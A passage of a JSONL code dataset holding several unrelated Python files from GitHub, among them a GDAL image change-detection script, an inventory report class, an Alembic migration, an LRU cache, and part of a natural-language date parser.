ycount1).astype(data_type)\n G1 = srcband.ReadRaster(0, 0, xcount1, ycount1)\n G1 = np.fromstring(G1, np.uint8)\n G1 = np.reshape(G1, [ycount1, xcount1]).astype(data_type)\n\n srcband = src_ds1.GetRasterBand(3)\n # B1 = srcband.ReadAsArray(0, 0, xcount1, ycount1).astype(data_type)\n B1 = srcband.ReadRaster(0, 0, xcount1, ycount1)\n B1 = np.fromstring(R1, np.uint8)\n B1 = np.reshape(R1, [ycount1, xcount1]).astype(data_type)\n\n src_ds1 = None\n src_ds2 = gdal.Open(img2_path)\n ibands2 = src_ds2.RasterCount\n xcount2 = src_ds2.RasterXSize\n ycount2 = src_ds2.RasterYSize\n\n geoTrans2 = src_ds2.GetGeoTransform()\n srcPro2 = src_ds2.GetProjection()\n\n assert ibands2 >= 3, '%s波段数不足3' % img2_path\n\n assert ibands1 == ibands2, '两张图像波段不一致'\n assert xcount1 == xcount2, '两张图像宽不一致'\n assert ycount1 == ycount2, '两张图像高不一致'\n assert geoTrans1 == geoTrans2, '两张图像空间参考不一致'\n assert srcPro1 == srcPro2, '两张图像投影不一致'\n\n srcband = src_ds2.GetRasterBand(1)\n # R2 = srcband.ReadAsArray(0, 0, xcount2, ycount2).astype(data_type)\n R2 = srcband.ReadRaster(0, 0, xcount2, ycount2)\n R2 = np.fromstring(R2, np.uint8)\n R2 = np.reshape(R2, [ycount2, xcount2]).astype(data_type)\n\n srcband = src_ds2.GetRasterBand(2)\n # G2 = srcband.ReadAsArray(0, 0, xcount2, ycount2).astype(data_type)\n G2 = srcband.ReadRaster(0, 0, xcount2, ycount2)\n G2 = np.fromstring(G2, np.uint8)\n G2 = np.reshape(G2, [ycount2, xcount2]).astype(data_type)\n\n srcband = src_ds2.GetRasterBand(3)\n # B2 = srcband.ReadAsArray(0, 0, xcount2, ycount2).astype(data_type)\n B2 = srcband.ReadRaster(0, 0, xcount2, ycount2)\n B2 = np.fromstring(B2, np.uint8)\n B2 = np.reshape(B2, [ycount2, xcount2]).astype(data_type)\n\n # 每张图各自像素作逐差\n img1 = abs(R1 - G1) + abs(R1 - B1) + abs(G1 - B1)\n\n img2 = abs(R2 - G2) + abs(R2 - B2) + abs(G2 - B2)\n\n # 像素缩放\n img1 = (img1 - np.min(img1, 0)) / (np.max(img1, 0) - np.min(img1, 0) + 0.001)\n img2 = (img2 - np.min(img2, 0)) / (np.max(img2, 0) - np.min(img2, 0) + 0.001)\n\n img = abs(img1 - img2)\n\n img = img - np.mean(img, 0) * 1.1 + np.var(img, 0) * 2 # 减去阈值\n\n # 将小于0的重置为0\n img = np.maximum(img, 0)\n\n # 中值滤镜更好地保留边缘\n img = ndimage.median_filter(img, 5)\n\n # 如果原始影像像素值为0,即没有数据不做检测,将img对应的位置像素值设为0\n mask1 = (R1 != 0).astype(np.float32)\n mask2 = (R2 != 0).astype(np.float32)\n img = img * mask1 * mask2\n\n # 输出结果图像\n\n # raster_fn = path.join(sys.argv[3], img_name + '_mask.tif')\n\n raster_fn=path.join(img_save,img_name + '_mask.tif')\n\n target_ds = gdal.GetDriverByName('GTiff').Create(raster_fn, xcount1, ycount1, 1, gdal.GDT_Byte)\n target_ds.SetGeoTransform(geoTrans1) # 设置掩膜的地理参考\n target_ds.SetProjection(srcPro1) # 设置掩膜坐标引用\n\n target_ds.GetRasterBand(1).WriteArray(img, 0, 0)\n # target_ds.GetRasterBand(1).WriteRaster(0,0,xcount1,ycount1,img.tobytes())\n # [target_ds.GetRasterBand(1).WriteArray(img, 0, i) for i in ycount1]\n target_ds.FlushCache()\n\n target_ds = None\n src_ds = None\n\ndef Image_detection(img_path):\n '''\n 返回对比检测的结果数组numpy,图像的地理坐标\n :param img_path: img_path[0]图一,img_path[1]图二\n :return: \n '''\n data_type = np.float32\n\n src_ds1 = gdal.Open(img_path[0], GA_ReadOnly)\n ibands1 = src_ds1.RasterCount\n xcount1 = src_ds1.RasterXSize\n ycount1 = src_ds1.RasterYSize\n\n geoTrans1 = src_ds1.GetGeoTransform()\n srcPro1 = src_ds1.GetProjection()\n\n assert ibands1 >= 3, '%s波段数不足3' % img_path[0]\n srcband = src_ds1.GetRasterBand(1)\n R1 = srcband.ReadAsArray(0, 0, xcount1, ycount1).astype(data_type)\n\n srcband = src_ds1.GetRasterBand(2)\n G1 = srcband.ReadAsArray(0, 0, xcount1, ycount1).astype(data_type)\n\n srcband = src_ds1.GetRasterBand(3)\n B1 = srcband.ReadAsArray(0, 0, xcount1, ycount1).astype(data_type)\n src_ds1 = None\n\n src_ds2 = gdal.Open(img_path[1], GA_ReadOnly)\n ibands2 = src_ds2.RasterCount\n xcount2 = src_ds2.RasterXSize\n ycount2 = src_ds2.RasterYSize\n\n geoTrans2 = src_ds2.GetGeoTransform()\n srcPro2 = src_ds2.GetProjection()\n\n assert ibands2 >= 3, '%s波段数不足3' % img_path[1]\n\n assert ibands1 == ibands2, '两张图像波段不一致'\n assert xcount1 == xcount2, '两张图像宽不一致'\n assert ycount1 == ycount2, '两张图像高不一致'\n assert geoTrans1 == geoTrans2, '两张图像空间参考不一致'\n assert srcPro1 == srcPro2, '两张图像投影不一致'\n\n srcband = src_ds2.GetRasterBand(1)\n R2 = srcband.ReadAsArray(0, 0, xcount2, ycount2).astype(data_type)\n\n srcband = src_ds2.GetRasterBand(2)\n G2 = srcband.ReadAsArray(0, 0, xcount2, ycount2).astype(data_type)\n\n srcband = src_ds2.GetRasterBand(3)\n B2 = srcband.ReadAsArray(0, 0, xcount2, ycount2).astype(data_type)\n\n src_ds2 = None\n # 每张图各自像素作逐差\n img1 = abs(R1 - G1) + abs(R1 - B1) + abs(G1 - B1)\n\n img2 = abs(R2 - G2) + abs(R2 - B2) + abs(G2 - B2)\n\n # 像素缩放\n img1 = (img1 - np.min(img1, 0)) / (np.max(img1, 0) - np.min(img1, 0) + 0.001)\n img2 = (img2 - np.min(img2, 0)) / (np.max(img2, 0) - np.min(img2, 0) + 0.001)\n\n img = abs(img1 - img2)\n\n img = img - np.mean(img, 0) * 1.1 + np.var(img, 0) * 2 # 减去阈值\n\n # 将小于0的重置为0\n img = np.maximum(img, 0)\n\n # 中值滤镜更好地保留边缘\n img = ndimage.median_filter(img, 5)\n\n # 如果原始影像像素值为0,即没有数据不做检测,将img对应的位置像素值设为0\n mask1 = (R1 != 0).astype(np.float32)\n mask2 = (R2 != 0).astype(np.float32)\n img = img * mask1 * mask2\n\n return img,geoTrans1\n\ndef Image_contrast_detection2(file1, file2, img_save):\n '''\n 2个文件夹中的图像对比检测,返回最后的输出所有图像合并结果图(按文件夹处理)\n :param file1_path: 文件夹1\n :param file2_path: 文件夹2\n :param img_save: 输出结果保存路径\n :return: 文件夹1,2对应图像对比结果\n '''\n\n # 为了支持中文路径,请添加下面这句代码\n gdal.SetConfigOption(\"GDAL_FILENAME_IS_UTF8\", \"NO\")\n\n gdal.AllRegister() # 注册驱动\n\n # assert len(sys.argv) >= 4, \"参数不足 使用参考:\\n python test.py 图一路径 图二路径 输出结果路径\"\n\n # img1_path = sys.argv[1]\n # img2_path = sys.argv[2]\n\n [img1_paths,img_paths]=get_tif_path(file1,file2)\n\n info_struct=get_geoPosition(img1_paths)\n img1_paths=None\n flag = True\n i=0\n # data_type = np.float32\n for img_path in img_paths:\n\n sys.stdout.write('\\r>> The program is calculating... %d/%d' % (\n i + 1, len(img_paths))) # 输出进度条\n sys.stdout.flush()\n\n # img_name = img_path[0].split('/')[-1].split('.')[0] # Linux 为'/' ;windows 为'\\\\'\n img,geoTrans=Image_detection(img_path)\n\n if flag:\n # 输出结果图像\n\n # raster_fn = path.join(sys.argv[3], img_name + '_mask.tif')\n\n raster_fn = img_save+'_mask.tif'\n\n # target_ds = gdal.GetDriverByName('GTiff').Create(raster_fn, xcount1, ycount1, 1, gdal.GDT_Byte)\n target_ds = gdal.GetDriverByName('GTiff').Create(raster_fn, int(info_struct[2]), int(info_struct[3]), 1, gdal.GDT_Byte)\n target_ds.SetGeoTransform(info_struct[0]) # 设置掩膜的地理参考\n target_ds.SetProjection(info_struct[1]) # 设置掩膜坐标引用\n flag=False\n\n # 反算出在合并图中的行列坐标\n xoff = np.ceil((geoTrans[0] - info_struct[0][0]) / geoTrans[1])\n yoff = np.ceil((geoTrans[3] - info_struct[0][3]) / geoTrans[5])\n\n target_ds.GetRasterBand(1).WriteArray(img, int(xoff), int(yoff))\n # target_ds.GetRasterBand(1).WriteRaster(0,0,xcount1,ycount1,img.tobytes())\n # [target_ds.GetRasterBand(1).WriteArray(img, 0, i) for i in ycount1]\n target_ds.FlushCache()\n i += 1\n sys.stdout.write('\\n')\n sys.stdout.flush()\n target_ds = None\n\n\nif __name__==\"__main__\":\n assert len(sys.argv) >= 4, \"参数不足 使用参考:\\n python test.py 图一文件夹 图二文件夹 输出结果路径\"\n\n file1_path = sys.argv[1]\n file2_path = sys.argv[2]\n img_save=sys.argv[3]\n\n # file1_path = r'E:\\05'\n # file2_path = r\"E:\\06\"\n # img_save = r'E:\\\\'\n\n start_time = datetime.now()\n Image_contrast_detection2(file1_path, file2_path, img_save)\n end_time = datetime.now()\n print((end_time - start_time).total_seconds())\n","repo_name":"wucng/Tensorflow","sub_path":"图像对比检测/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":13495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"10367723497","text":"from collections import Counter\nfrom datetime import datetime\n\n\nclass SimpleReport:\n @classmethod\n def fabricacao_mais_antiga(cls, stock):\n now = datetime.today()\n dateArray = []\n for item in stock:\n if datetime.strptime(item[\"data_de_fabricacao\"], \"%Y-%m-%d\") < now:\n dateArray.append(item[\"data_de_fabricacao\"])\n\n return f\"Data de fabricação mais antiga: {min(dateArray)}\"\n\n @classmethod\n def validade_mais_proxima(cls, stock):\n now = datetime.today()\n dateArray = []\n for item in stock:\n if datetime.strptime(item[\"data_de_validade\"], \"%Y-%m-%d\") > now:\n dateArray.append(item[\"data_de_validade\"])\n\n return f\"Data de validade mais próxima: {min(dateArray)}\"\n\n @classmethod\n def empresa_com_maior_estoque(cls, stock):\n emp = [obj[\"nome_da_empresa\"] for obj in stock]\n return (\n \"Empresa com maior quantidade de produtos estocados: \"\n + Counter(emp).most_common()[0][0]\n )\n\n @classmethod\n def generate(cls, stock):\n return (\n f\"{cls.fabricacao_mais_antiga(stock)}\\n\"\n f\"{cls.validade_mais_proxima(stock)}\\n\"\n f\"{cls.empresa_com_maior_estoque(stock)}\\n\"\n )\n","repo_name":"amosrodrigues/trybe","sub_path":"Desenvolvimento-Back-End/projects-backend/invetory-report/inventory_report/reports/simple_report.py","file_name":"simple_report.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38500843707","text":"\"\"\"First migration\n\nRevision ID: 26934fe401c1\nRevises: None\nCreate Date: 2019-07-01 15:48:39.561105\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '26934fe401c1'\ndown_revision = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('users',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('phone', sa.String(length=64), nullable=True),\n sa.Column('currentPlan', sa.String(length=64), nullable=True),\n sa.Column('personalInfo', sa.String(length=128), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_users_phone'), 'users', ['phone'], unique=True)\n op.create_table('data',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('userId', sa.Integer(), nullable=True),\n sa.Column('isUser', sa.Boolean(), nullable=False),\n sa.Column('content', sa.String(length=256), nullable=True),\n sa.Column('time', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['userId'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('records',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('userId', sa.Integer(), nullable=True),\n sa.Column('date', sa.Date(), nullable=False),\n sa.Column('isSlept', sa.Boolean(), nullable=False),\n sa.Column('reason', sa.String(), nullable=True),\n sa.ForeignKeyConstraint(['userId'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('records')\n op.drop_table('data')\n op.drop_index(op.f('ix_users_phone'), table_name='users')\n op.drop_table('users')\n # ### end Alembic commands ###\n","repo_name":"timoderbeste/sleep-tracking-bot","sub_path":"emile/migrations/versions/26934fe401c1_first_migration.py","file_name":"26934fe401c1_first_migration.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36389043065","text":"#! /usr/bin/env python3\n\nfrom functools import cached_property\nfrom dataclasses import dataclass\nfrom typing import Dict, Optional\n\nfrom bs4 import BeautifulSoup # type: ignore\nfrom bs4.element import Tag # type: ignore\nfrom dataclasses_json import DataClassJsonMixin\n\n\n@dataclass\nclass FishWeatherPreferences(DataClassJsonMixin):\n weathers: Dict[str, int]\n unique_catches_across_all_weathers: int\n\n @cached_property\n def weather_percentage(self) -> Dict[str, float]:\n return {k: v / self.unique_catches_across_all_weathers for k, v in self.weathers.items()}\n\n @staticmethod\n async def _parse_weathers(weather_table: Tag) -> Dict[str, int]:\n temp_weather: Dict[str, int] = dict()\n # noinspection SpellCheckingInspection\n tbody: Tag = weather_table.find_all('tbody')[1]\n\n for tr in tbody.find_all('tr'):\n td1, td2 = tr.find_all('td') # type: Tag, Tag\n weather_name: str = td1.find('span', {'class': 'weather_name'}).text.strip()\n cw_bar: Tag = td2.find('div', {'class': 'cw_bar'})\n\n weather_catches: int = int(cw_bar.attrs['title'].split('/')[0])\n temp_weather[weather_name] = weather_catches\n\n return temp_weather\n\n @staticmethod\n async def _parse_unique_catches_across_all_weathers(weather_table: Tag) -> int:\n num_holder = weather_table.find('span', {'class': 'small'})\n return int(num_holder.find('b').text.strip())\n\n @classmethod\n async def get_weather_preferences_from_fish_soup(cls, soup: BeautifulSoup) -> Optional['FishWeatherPreferences']:\n weather_table: Tag = soup.find('table', {'class': 'info_section chart_weather'})\n\n if not weather_table:\n return None\n\n return cls(\n weathers=await cls._parse_weathers(weather_table),\n unique_catches_across_all_weathers=await cls._parse_unique_catches_across_all_weathers(weather_table)\n )\n","repo_name":"joshua-software-dev/FF14AnglerParser","sub_path":"ff14angler/dataClasses/fish/fishWeatherPreferences.py","file_name":"fishWeatherPreferences.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14429174268","text":"import sys\n\nimport pygame\n\nSCREEN_DIM = 800\nCONSTRAINT = 72\nDEFAULT_STEP_SIZE = 100\n\n\ndef quitLoopConditional(started):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n started = False\n pygame.quit()\n sys.exit()\n\n\n# @:param value to scale to display size for global size\ndef scaled_value(x, isRelative=False):\n scaled_val = None\n if isRelative is False:\n scaled_val = int(x * (SCREEN_DIM / (CONSTRAINT * 2)))\n if isRelative is not False:\n scaled_val = int((x - (-CONSTRAINT)) * (SCREEN_DIM / (CONSTRAINT * 2)))\n return scaled_val\n\n\n# @:param size of the object in inches\n# @:param path to where the image of robot visualizer resides to load and scale to display size\ndef load_image(size, pathToImage, alpha=None):\n if alpha is None:\n surface = pygame.image.load(pathToImage).convert()\n return pygame.transform.scale(surface, (int(scaled_value(size)),\n int(scaled_value(size))))\n\n if alpha is not None:\n surface = pygame.image.load(pathToImage).convert_alpha()\n return pygame.transform.scale(surface, (int(scaled_value(size)),\n int(scaled_value(size))))\n","repo_name":"amangalampalli/SplineTrajectoryGenerator","sub_path":"visualizer/utilities/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32625660505","text":"# Implements an LRU cache\n\n\nclass Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n self.prev = None\n \n\nclass DoublyLinkedList:\n def __init__(self):\n self.head = None\n self.tail = None\n\n def add(self, node):\n if not self.head and not self.tail:\n self.head = node\n self.tail = node\n \n elif self.head != node:\n self.head.next = node\n node.prev = self.head\n self.head = node\n \n def peek_head(self):\n return self.head.value\n \n def pop_tail(self):\n if self.tail:\n node = self.tail\n self.tail = node.prev\n \n if self.tail:\n self.tail.next = None\n\n return node.value\n \n return None\n \n def set_head(self, node):\n if node.prev:\n node.prev.next = node.next\n\n if node.next:\n node.next.prev = node.prev\n\n self.add(node)\n\n\nclass LRUCache:\n # O(1) time\n def __init__(self, size):\n self.max_size = size or 1\n self.cache = dict()\n self.keys = DoublyLinkedList()\n\n # O(1) time\n def insert_key_value_pair(self, key, value): \n if key not in self.cache:\n if len(self.cache) == self.max_size:\n self.pop_least_recent_key()\n\n node = Node((key, value))\n self.keys.add(node)\n self.cache[key] = node\n\n else:\n self.cache[key].value = (key, value)\n \n # O(1) time\n def get_most_recent_key(self):\n return self.keys.peek_head()[0]\n \n # O(1) time\n def pop_least_recent_key(self):\n least_recent = self.keys.pop_tail()\n del self.cache[least_recent[0]]\n\n # O(1) time\n def get_value_from_key(self, key):\n if key in self.cache:\n node = self.cache[key]\n self.keys.set_head(node)\n return node.value[1]\n \n return None\n\n\nif __name__ == \"__main__\":\n cache = LRUCache(3)\n cache.insert_key_value_pair(\"b\", 2)\n cache.insert_key_value_pair(\"a\", 1)\n cache.insert_key_value_pair(\"c\", 3)\n assert cache.get_most_recent_key() == \"c\"\n assert cache.get_value_from_key(\"a\") == 1\n assert cache.get_most_recent_key() == \"a\"\n cache.insert_key_value_pair(\"d\", 4)\n assert cache.get_value_from_key(\"b\") == None\n cache.insert_key_value_pair(\"a\", 5)\n cache.get_value_from_key(\"a\") == 5\n print(\"You're all set!\")","repo_name":"tobeyOguney/Zoo-of-Algorithms","sub_path":"LRU Cache/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"23815461278","text":"import datetime\nimport re\n\nimport pyparsing\nfrom pyparsing import Optional\nfrom dateutil.relativedelta import relativedelta\nfrom kronosparser import utils\nfrom kronosparser.time_interval import TimeInterval\nfrom kronosparser.word_number import units\n\n_BEGINNING = 1\n_MIDDLE = 2\n_END = 3\n\n_CENTURY_CHANGE = 30\n\n\ndef utc_now():\n return datetime.datetime.utcnow().replace(microsecond=0)\n\n\ndef utc_today():\n return datetime.datetime.utcnow().date()\n\n\ndef past_future_wrap(func):\n def decorated_func(tokens, origin=None):\n if origin is None:\n origin = utc_today()\n if 'weekday_ref' in tokens and 'dir_rel' not in tokens.weekday_ref:\n for i, tag in [(-1, 'past'), (1, 'future')]:\n toks = tokens.copy()\n toks.weekday_ref.dir_rel = i\n func(toks, origin=origin)\n tokens[tag] = {'date': toks['date']}\n if 'days_delta' in toks:\n tokens[tag]['days_delta'] = toks['days_delta']\n if 'tz_threshold' in toks:\n tokens[tag]['tz_threshold'] = toks['tz_threshold']\n else:\n func(tokens, origin=origin)\n\n return decorated_func\n\n\ndef past_future_unwrap(func):\n time_keys = ['past', 'future']\n\n def decorated_func(tokens):\n if 'past' in tokens:\n for time_key in time_keys:\n toks = dict(tokens[time_key])\n for key, val in tokens.items():\n if key not in time_keys:\n toks[key] = val\n func(toks)\n for key, val in toks.items():\n tokens[time_key][key] = val\n else:\n func(tokens)\n\n return decorated_func\n\n\ndef tz_decorate(key, rel_hour=0):\n def tz_decorator(func):\n def decorated_func(tokens, origin=None):\n if origin is None:\n origin = utc_today()\n datetime_utc = func(tokens, origin=origin)\n now = utc_now()\n diff_hour = (now.hour - rel_hour) % 24\n if diff_hour >= 12:\n datetime_alt = func(tokens, origin=origin + datetime.timedelta(days=1))\n else:\n datetime_alt = func(tokens, origin=origin - datetime.timedelta(days=1))\n if datetime_utc and datetime_alt:\n tokens[key] = datetime_utc\n if datetime_utc != datetime_alt:\n tokens['days_delta'] = (datetime_alt - datetime_utc).days\n if diff_hour >= 12:\n tokens['tz_threshold'] = 24 - diff_hour\n else:\n tokens['tz_threshold'] = -diff_hour - 1\n elif datetime_utc or datetime_alt:\n tokens[key] = datetime_utc or datetime_alt\n else:\n tokens['datetime_parsing_error'] = True\n return\n\n return decorated_func\n\n return tz_decorator\n\n\ndef _setup_start(tokens):\n start = None\n for start_type in ['exclusive_start', 'inclusive_start']:\n if start_type in tokens:\n if 'future' in tokens[start_type]:\n start = tokens[start_type]['future']['calculatedTime']\n else:\n start = tokens[start_type]['calculatedTime']\n if isinstance(start, TimeInterval):\n start = start.get_end()\n if start is None:\n tokens['datetime_parsing_error'] = True\n return None\n if isinstance(start, datetime.date) and start_type == 'exclusive_start':\n start += datetime.timedelta(days=1)\n break\n return start\n\n\ndef _setup_end(tokens):\n end = None\n for end_type in ['exclusive_end', 'inclusive_end']:\n if end_type in tokens:\n if 'future' in tokens[end_type]:\n end = tokens[end_type]['future']['calculatedTime']\n del tokens[end_type]\n else:\n end = tokens[end_type]['calculatedTime']\n if isinstance(end, TimeInterval):\n end = end.get_start()\n if end is None:\n tokens['datetime_parsing_error'] = True\n return None\n if isinstance(end, datetime.date) and end_type == 'exclusive_end':\n end -= datetime.timedelta(1)\n break\n return end\n\n\ndef before_after_any(tokens):\n start = _setup_start(tokens)\n end = _setup_end(tokens)\n if 'past' in tokens:\n del tokens['past']\n del tokens['future']\n if start and end:\n tokens['calculatedTime'] = TimeInterval(start, end)\n\n\ndef set_datetime(tokens):\n if 'past' in tokens:\n return {\n 'past': set_datetime_single(tokens['past']),\n 'future': set_datetime_single(tokens['future'])\n }\n return set_datetime_single(tokens)\n\n\ndef set_datetime_single(tokens):\n result = {}\n if tokens.get('datetime_parsing_error') or 'calculatedTime' not in tokens:\n return {'datetime_parsing_error': True}\n result['utc'] = tokens.get('utc', False)\n if 'days_delta' in tokens and 'tz_threshold' in tokens:\n result['days_delta'] = tokens['days_delta']\n result['tz_threshold'] = tokens['tz_threshold']\n if isinstance(tokens['calculatedTime'], datetime.datetime):\n result['datetime'] = tokens['calculatedTime'].isoformat(' ')\n elif isinstance(tokens['calculatedTime'], datetime.date):\n result['date'] = tokens['calculatedTime'].isoformat()\n elif isinstance(tokens['calculatedTime'], datetime.time):\n if utc_now().hour >= 12:\n result['days_delta'] = 1\n result['tz_threshold'] = 24 - utc_now().hour\n else:\n result['days_delta'] = -1\n result['tz_threshold'] = -utc_now().hour - 1\n result['datetime'] = datetime.datetime.combine(utc_today(),\n tokens['calculatedTime']).isoformat(' ')\n elif isinstance(tokens['calculatedTime'], TimeInterval):\n result['interval'] = {\n 'start': tokens['calculatedTime'].get_start().isoformat(),\n 'end': tokens['calculatedTime'].get_end().isoformat()\n }\n return result\n\n\ndef process_two_digits_year(tokens):\n two_digit_token = int(tokens[0])\n if two_digit_token > _CENTURY_CHANGE: # TODO: Will break after singularity!\n return 1900 + two_digit_token\n return 2000 + two_digit_token\n\n\ndef is_leap_year(y):\n return y % 4 == 0 and (y % 100 != 0 or y % 400 == 0)\n\n\ndef year_interval(year_num):\n return TimeInterval(datetime.date(year_num, 1, 1), datetime.date(year_num, 12, 31))\n\n\ndef quarter_by_date(origin=None):\n origin = origin or utc_today()\n if origin.month < 4:\n return 1\n if origin.month < 7:\n return 2\n if origin.month < 10:\n return 3\n return 4\n\n\ndef quarter_interval(quarter_num, year_num):\n q = {\n 1: TimeInterval(datetime.date(year_num, 1, 1), datetime.date(year_num, 3, 31)),\n 2: TimeInterval(datetime.date(year_num, 4, 1), datetime.date(year_num, 6, 30)),\n 3: TimeInterval(datetime.date(year_num, 7, 1), datetime.date(year_num, 9, 30)),\n 4: TimeInterval(datetime.date(year_num, 10, 1), datetime.date(year_num, 12, 31))\n }\n return q[quarter_num]\n\n\ndef month_days(month_num, year_num):\n return [None, 31, 29 if is_leap_year(year_num) else 28, 31, 30, 31, 30, 31, 31, 30, 31, 30,\n 31][month_num]\n\n\ndef month_interval(month_num, year_num):\n return TimeInterval(datetime.date(year_num, month_num, 1),\n datetime.date(year_num, month_num, month_days(month_num, year_num)))\n\n\ndef convert_to_timedelta(tokens):\n unit = tokens.time_unit.lower().rstrip('s')\n dir_tok = tokens.dir_abs * tokens.get('qty', 1)\n tokens['timeOffset'] = {\n 'year': relativedelta(years=dir_tok),\n 'month': relativedelta(months=dir_tok),\n 'week': datetime.timedelta(weeks=dir_tok),\n 'day': datetime.timedelta(days=dir_tok),\n 'hour': datetime.timedelta(hours=dir_tok),\n 'minute': datetime.timedelta(minutes=dir_tok),\n 'second': datetime.timedelta(seconds=dir_tok),\n }[unit]\n\n\n@past_future_wrap\n@tz_decorate('date')\ndef convert_to_day(tokens, origin=None):\n if 'weekday_ref' in tokens:\n today_num = origin.weekday()\n named_day_num = weekday_number_mapping(tokens.weekday_ref.day_name.lower())\n diff = named_day_num - today_num\n if tokens.weekday_ref.dir_rel >= 0:\n day_diff = diff if diff > 0 else diff + 7\n else:\n day_diff = diff if diff < 0 else diff - 7\n return origin + datetime.timedelta(days=day_diff)\n\n name = tokens.name.lower()\n return {\n 'today': origin,\n 'yesterday': origin + datetime.timedelta(days=-1),\n 'tomorrow': origin + datetime.timedelta(days=1),\n }[name]\n\n\n@tz_decorate('date')\ndef convert_to_date(tokens, origin=None):\n yy = int(tokens.year) if 'year' in tokens else origin.year\n mm = month_mapping(tokens.month) if 'month' in tokens else origin.month\n dd = day_number_mapping(tokens.day[0] if isinstance(tokens.day, list) else tokens.day)\n parsed_date = datetime.date(yy, mm, dd)\n if 'day_name' in tokens and parsed_date.weekday() != weekday_number_mapping(tokens['day_name']):\n return None\n return parsed_date\n\n\ndef convert_to_time(tokens):\n hh = int(tokens.get('hour', 0))\n mm = int(tokens.get('minute', 0))\n ss = int(tokens.get('second', 0))\n return datetime.time(hh, mm, ss)\n\n\ndef convert_to_interval(tokens):\n origin = utc_today()\n unit = tokens.time_unit.lower().rstrip('s')\n dir_tok = tokens.dir_rel\n if unit == 'day':\n start = datetime.datetime.combine(origin, datetime.time(8))\n end = datetime.datetime.combine(origin, datetime.time(18))\n elif unit == 'week':\n weekday = origin.weekday()\n start = origin + datetime.timedelta(days=-weekday + 7 * dir_tok)\n end = origin + datetime.timedelta(days=6 - weekday + 7 * dir_tok)\n elif unit == 'month':\n rel_date = origin + relativedelta(months=dir_tok)\n start = datetime.date(rel_date.year, rel_date.month, 1)\n end = datetime.date(rel_date.year, rel_date.month, month_days(rel_date.month,\n rel_date.year))\n if 'day' in tokens:\n _day = day_number_mapping(tokens.day)\n if _day <= month_days(rel_date.month, rel_date.year):\n tokens['calculatedTime'] = datetime.date(rel_date.year, rel_date.month, _day)\n return\n elif unit == 'year':\n _year = origin.year + dir_tok\n if 'month' in tokens:\n _month = month_mapping(tokens.month)\n start = datetime.date(_year, _month, 1)\n end = datetime.date(_year, _month, month_days(_month, _year))\n else:\n start = datetime.date(_year, 1, 1)\n end = datetime.date(_year, 12, 31)\n else:\n return\n tokens['calculatedTime'] = TimeInterval(start, end)\n\n\n@past_future_unwrap\ndef convert_to_abs_time(tokens):\n day = tokens.get('named_day', tokens.get('date', None))\n if 'time_of_day' in tokens:\n if isinstance(tokens['time_of_day'], datetime.time):\n parsed_time = tokens['time_of_day']\n elif tokens['time_of_day'] in ['noon', 'midnight']:\n parsed_time = {\n 'noon': datetime.time(12),\n 'midnight': datetime.time(0),\n }[tokens['time_of_day']]\n elif 'hour' in tokens:\n parsed_time = convert_to_time(tokens)\n else:\n parsed_time = utc_now().time()\n else:\n parsed_time = None\n if parsed_time is not None and day is not None:\n tokens['abs_time'] = datetime.datetime.combine(day, parsed_time)\n elif parsed_time is not None:\n tokens['abs_time'] = parsed_time\n elif day is not None:\n tokens['abs_time'] = day\n\n\n@past_future_unwrap\ndef calculate_time(tokens):\n if 'abs_time' in tokens:\n abs_time = tokens['abs_time']\n elif tokens.time_unit in [hour_, minute_, _second_]:\n abs_time = utc_now()\n else:\n abs_time = utc_today()\n if 'timeOffset' in tokens:\n abs_time += tokens['timeOffset']\n tokens['calculatedTime'] = abs_time\n\n\ndef day_number_mapping(day_str):\n d = {\n '1st': 1,\n '2nd': 2,\n '3rd': 3,\n '4th': 4,\n '5th': 5,\n '6th': 6,\n '7th': 7,\n '8th': 8,\n '9th': 9,\n '10th': 10,\n '11th': 11,\n '12th': 12,\n '13th': 13,\n '14th': 14,\n '15th': 15,\n '16th': 16,\n '17th': 17,\n '18th': 18,\n '19th': 19,\n '20th': 20,\n '21st': 21,\n '22nd': 22,\n '23rd': 23,\n '24th': 24,\n '25th': 25,\n '26th': 26,\n '27th': 27,\n '28th': 28,\n '29th': 29,\n '30th': 30,\n '31st': 31\n }\n day_str = day_str.lower()\n if day_str in d:\n return d[day_str]\n return int(day_str)\n\n\ndef weekday_number_mapping(weekday_str):\n d = {\n 'monday': 0,\n 'mon': 0,\n 'mon.': 0,\n 'tuesday': 1,\n 'tue': 1,\n 'tue.': 1,\n 'tues': 1,\n 'tues.': 1,\n 'wednesday': 2,\n 'wed': 2,\n 'wed.': 2,\n 'thursday': 3,\n 'thu': 3,\n 'thu.': 3,\n 'thurs': 3,\n 'thurs.': 3,\n 'friday': 4,\n 'fri': 4,\n 'fri.': 4,\n 'saturday': 5,\n 'sat': 5,\n 'sat.': 5,\n 'sunday': 6,\n 'sun': 6,\n 'sun.': 6\n }\n return d[weekday_str.lower()]\n\n\ndef month_mapping(month_str):\n m = {\n '1': 1,\n 